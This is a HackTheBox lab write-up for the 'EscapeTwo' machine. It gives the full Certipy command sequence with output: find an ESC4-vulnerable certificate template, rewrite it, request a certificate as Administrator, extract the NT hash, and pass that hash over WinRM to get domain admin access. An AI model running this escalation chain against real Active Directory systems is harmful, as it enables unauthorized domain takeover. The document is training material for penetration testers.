➜  EscapeTwo certipy find -dc-ip 10.10.11.51 -u ca_svc -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sequel-DC01-CA
    DNS Name                            : DC01.sequel.htb
    Certificate Subject                 : CN=sequel-DC01-CA, DC=sequel, DC=htb
    Certificate Serial Number           : 152DBD2D8E9C079742C0F3BFF2A211D3
    Certificate Validity Start          : 2024-06-08 16:50:40+00:00
    Certificate Validity End            : 2124-06-08 17:00:40+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : SEQUEL.HTB\Administrators
      Access Rights
        ManageCertificates              : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        ManageCa                        : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Enroll                          : SEQUEL.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : DunderMifflinAuthentication
    Display Name                        : Dunder Mifflin Authentication
    Certificate Authorities             : sequel-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectRequireCommonName
                                          SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
                                          PublishToDs
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Enterprise Admins
        Full Control Principals         : SEQUEL.HTB\Cert Publishers
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Property Principals       : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC4                              : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions
➜  EscapeTwo

ESC4 template exploitation

We updated the certificate DunderMifflinAuthentication using certipy and requested a certificate with upn of Administrator@sequel.htb

➜  EscapeTwo certipy template -u CA_SVC@sequel.htb -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -template DunderMifflinAuthentication -save-old -dc-ip 10.10.11.51 -debug 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.11.51:636 - ssl
[+] Default path: DC=sequel,DC=htb
[+] Configuration path: CN=Configuration,DC=sequel,DC=htb
[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[+] MODIFY_DELETE:
[+]     pKIExtendedKeyUsage: []
[+]     msPKI-Certificate-Application-Policy: []
[+] MODIFY_REPLACE:
[+]     nTSecurityDescriptor: [b'\x01\x00\x04\x9c0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x00\x1c\x00\x01\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\xc8\xa3\x1f\xdd\xe9\xba\xb8\x90,\xaes\xbb\xf4\x01\x00\x00']
[+]     flags: [b'0']
[+]     pKIDefaultKeySpec: [b'2']
[+]     pKIKeyUsage: [b'\x86\x00']
[+]     pKIMaxIssuingDepth: [b'-1']
[+]     pKICriticalExtensions: [b'2.5.29.19', b'2.5.29.15']
[+]     pKIExpirationPeriod: [b'\x00@\x1e\xa4\xe8e\xfa\xff']
[+]     pKIDefaultCSPs: [b'1,Microsoft Enhanced Cryptographic Provider v1.0']
[+]     msPKI-Enrollment-Flag: [b'0']
[+]     msPKI-Private-Key-Flag: [b'16842768']
[+]     msPKI-Certificate-Name-Flag: [b'1']
[*] Successfully updated 'DunderMifflinAuthentication'
➜  EscapeTwo certipy req -u CA_SVC@sequel.htb -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -template DunderMifflinAuthentication -upn administrator@sequel.htb -dc-ip 10.10.11.51 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.11.51[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.11.51[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 5
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

With the administrator.pfx certificate we can request for an NT hash and login as Administrator into machine.

➜  EscapeTwo certipy auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff
➜  EscapeTwo

➜  EscapeTwo nxc winrm 10.10.11.51 -u Administrator -H 7a8d4e04986afa8ed4060f75e5a0b3ff
WINRM       10.10.11.51     5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
WINRM       10.10.11.51     5985   DC01             [+] sequel.htb\Administrator:7a8d4e04986afa8ed4060f75e5a0b3ff (Pwn3d!)
➜  EscapeTwo

Pentest Notes

Escape Two - HackTheBox